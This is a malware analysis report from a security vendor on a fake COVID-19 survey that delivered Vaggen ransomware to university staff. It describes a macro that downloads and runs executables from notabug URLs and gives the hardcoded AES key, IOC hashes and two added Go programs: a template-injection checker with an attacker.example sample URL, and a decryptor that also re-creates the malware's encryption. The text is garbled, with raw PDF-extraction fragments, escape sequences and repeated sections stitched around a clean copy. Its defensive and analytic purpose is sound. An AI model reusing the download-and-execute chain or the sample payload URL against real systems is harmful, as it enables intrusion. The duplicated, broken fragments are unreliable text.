The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2992 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2993 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2994 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2995 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2996 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.
In recent weeks, we've observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.
However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.
On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful, thanks to the rapid response of the UBC cybersecurity team.
Mandatory COVID-19 survey distributed to targeted recipients
The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey by email directly, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.
This was probably done to evade spam and phishing filters, which would have blocked messages coming from a newly registered email address with a low reputation. Share notifications, by contrast, arrive from the file-sharing services' own mail infrastructure, and blocking those without creating a large number of false positives is much harder.
The attacker claimed to be a manager and added the following comment in the file-sharing invitation (shared with us by UBC):
Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!
According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.
Phishing document analysis
The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The .docx itself contains no macro: its settings part declares an attached template whose relationship target is a URL, so Word fetches the .dotm when the document is opened and the macro only arrives at that point. Static inspection of the lure therefore shows nothing more than that URL.
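To triage a suspicious .docx for this delivery technique without opening it, the checker below unpacks the OOXML zip and reports every relationship that points at an external http(s) target, flagging the attachedTemplate kind specifically. It is an added example, not code from the post or from Malwarebytes: the function names are mine, the sample document it builds in memory is constructed for the demonstration, and the template URL in it (attacker.example) is a placeholder, since the post does not give the real template location.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// Finding is one relationship that makes Word reach out to the network on open.
type Finding struct {
	Part   string // the .rels part declaring it, e.g. word/_rels/settings.xml.rels
	Type   string // relationship type URI; its last path segment names the kind
	Target string // URL Word will fetch
}

// IsRemoteTemplate marks the template-injection primitive: an attachedTemplate
// relationship with a URL target, so Word downloads the .dotm, macros included.
func (f Finding) IsRemoteTemplate() bool {
	return strings.HasSuffix(f.Type, "/attachedTemplate")
}

// relationships mirrors the OPC .rels schema; elements match by local name.
type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// ExternalRelationships scans every .rels part of an OOXML package (docx, dotm,
// xlsx, ...) and returns the relationships whose TargetMode is External and whose
// target is an http(s) URL. Any of them deserves a look; the remote
// attachedTemplate is the pattern used in this campaign.
func ExternalRelationships(pkg []byte) ([]Finding, error) {
	zr, err := zip.NewReader(bytes.NewReader(pkg), int64(len(pkg)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML (zip) package: %w", err)
	}
	var out []Finding
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			t := strings.ToLower(r.Target)
			if r.TargetMode == "External" && (strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://")) {
				out = append(out, Finding{Part: f.Name, Type: r.Type, Target: r.Target})
			}
		}
	}
	return out, nil
}

// buildSampleDocx constructs, in memory, just the parts of a .docx the check
// needs: a settings part with an attachedTemplate and its .rels. Constructed test
// input, not the real lure; external=false gives a local target, as in a benign file.
func buildSampleDocx(target string, external bool) []byte {
	mode := ""
	if external {
		mode = ` TargetMode="External"`
	}
	parts := map[string]string{
		"word/settings.xml":            `<?xml version="1.0" encoding="UTF-8"?><w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:attachedTemplate r:id="rId1"/></w:settings>`,
		"word/_rels/settings.xml.rels": `<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="` + target + `"` + mode + `/></Relationships>`,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		if _, err := w.Write([]byte(body)); err != nil {
			panic(err)
		}
	}
	if err := zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	// Hypothetical URL: the post does not give the real template location.
	doc := buildSampleDocx("https://attacker.example/template.dotm", true)
	findings, err := ExternalRelationships(doc)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s -> %s (remote template: %v)\n", f.Part, f.Target, f.IsRemoteTemplate())
	}
}
```

Run it over a real file by replacing the constructed package with os.ReadFile of the document; a benign document normally has only local relationship targets, so any External http(s) target is a lead, and an attachedTemplate one is a strong one.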
The template was uploaded to a free code-hosting website (notabug.org).
When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the VBA Shell function to execute killar.exe
Checks the return value of Shell to see whether the launch succeeded (on success it is the task ID of the started program)
If successful, it sends an HTTP GET request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn't successful, it sends an HTTP GET request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.
Opening the phishing document (and letting the macro run) triggers a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event, and it can be very useful as an early warning that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.
Vaggen ransomware
After being deployed, the ransomware starts encrypting the user's files and adds the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.
The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, whose entry point is the function denoted as 'main_main'.
Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Three of them map to the following roles:
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen
A full list of the functions, along with their RVAs, is linked from the original post.
Some of the strings used by the malware (such as the content of the ransom note) are encrypted with XXTEA, using the xxtea-go library. Each encrypted chunk is first decoded from Base64, then decrypted with the hardcoded XXTEA key "STALKER". At the end of the execution, the ransom note is dropped on the Desktop.
Encrypting and renaming the files is implemented as the callback of the standard Go function path/filepath.Walk.
Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to a widely copied Go AES-GCM example (linked in the original post).
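The recovery this section makes possible, as an added example that is neither the post's code nor the malware's: it reproduces the on-disk layout the following paragraphs describe (12-byte nonce, ciphertext, 16-byte tag, all under the one hardcoded 32-byte key) with Go's standard AES-GCM, and turns it around into a decryptor that walks a directory tree the way the malware's own filepath.Walk callback does. The function names are mine and the sample plaintext is constructed; the key and the layout are the ones reported in the text.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// Key recovered from the binary: 32 bytes, hence AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const vaggenExt = ".VAGGEN"

func newGCM() (cipher.AEAD, error) {
	block, err := aes.NewCipher([]byte(vaggenKey))
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // 12-byte nonce, 16-byte tag
}

// sealLikeVaggen produces the observed layout, nonce || ciphertext || tag: passing
// the nonce as gcm.Seal's dst prefixes it, and Seal itself appends the tag.
// Present only to create test input offline; it is not the malware's code.
func sealLikeVaggen(plaintext []byte) ([]byte, error) {
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// RecoverVaggen splits a .VAGGEN blob into nonce and ciphertext+tag and opens it
// with the hardcoded key. Because GCM authenticates, a wrong key, a truncated
// file or a flipped byte fails cleanly instead of yielding garbage.
func RecoverVaggen(blob []byte) ([]byte, error) {
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize()+gcm.Overhead() {
		return nil, errors.New("too short to hold a nonce and a GCM tag")
	}
	nonce, ct := blob[:gcm.NonceSize()], blob[gcm.NonceSize():]
	pt, err := gcm.Open(nil, nonce, ct, nil)
	if err != nil {
		return nil, fmt.Errorf("GCM authentication failed (wrong key or damaged file): %w", err)
	}
	return pt, nil
}

// RecoverTree walks root and writes every *.VAGGEN file's plaintext to a sibling
// without the extension. The encrypted copy is left in place so a failure never
// destroys evidence. Returns how many files were recovered and the first error.
func RecoverTree(root string) (int, error) {
	recovered := 0
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if d.IsDir() || !strings.EqualFold(filepath.Ext(path), vaggenExt) {
			return nil
		}
		blob, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		pt, err := RecoverVaggen(blob)
		if err != nil {
			return fmt.Errorf("%s: %w", path, err)
		}
		if err := os.WriteFile(strings.TrimSuffix(path, filepath.Ext(path)), pt, 0o600); err != nil {
			return err
		}
		recovered++
		return nil
	})
	return recovered, err
}

func main() {
	// Constructed sample body, sealed as the malware would seal it, then recovered.
	body := []byte("quarterly report, constructed sample")
	blob, err := sealLikeVaggen(body)
	if err != nil {
		panic(err)
	}
	pt, err := RecoverVaggen(blob)
	fmt.Printf("len=%d (12+%d+16) roundtrip=%v err=%v\n", len(blob), len(body), bytes.Equal(pt, body), err)
}
```

Run RecoverTree against a copy of the affected tree rather than the only copy. The design point is the one the text makes: because the key is the same in every infection and embedded in the binary, the per-file random nonce protects nothing for the attacker, and the GCM tag tells the responder immediately whether a decryption attempt used the right key.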
The key is hardcoded, and the 12-byte nonce is generated with CryptGenRandom (the Windows backend of Go's crypto/rand at the time). The file content is then encrypted with the gcm.Seal function.
The output file (with the .VAGGEN extension) contains, in order:
the 12-byte nonce
the encrypted content
the 16-byte GCM authentication tag
The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money". Using this key, we can easily decrypt the content. Because the key is the same in every infection and is embedded in the binary, the per-file random nonce does not protect the attacker: anyone holding the sample holds the key, and the GCM tag then confirms whether a decryption attempt used the right one.
With all these elements, we can recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at the Bitcoin address given in the ransom note.
Unusually low ransom amount
Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.
However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point whether the University of British Columbia was the sole target.
Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises further questions about the motivation behind this phishing attack.
We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.
Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
IOCs
Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f
Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp
Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3041 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3042 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3043 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3044 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3045 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3046 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3047 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3048 of 
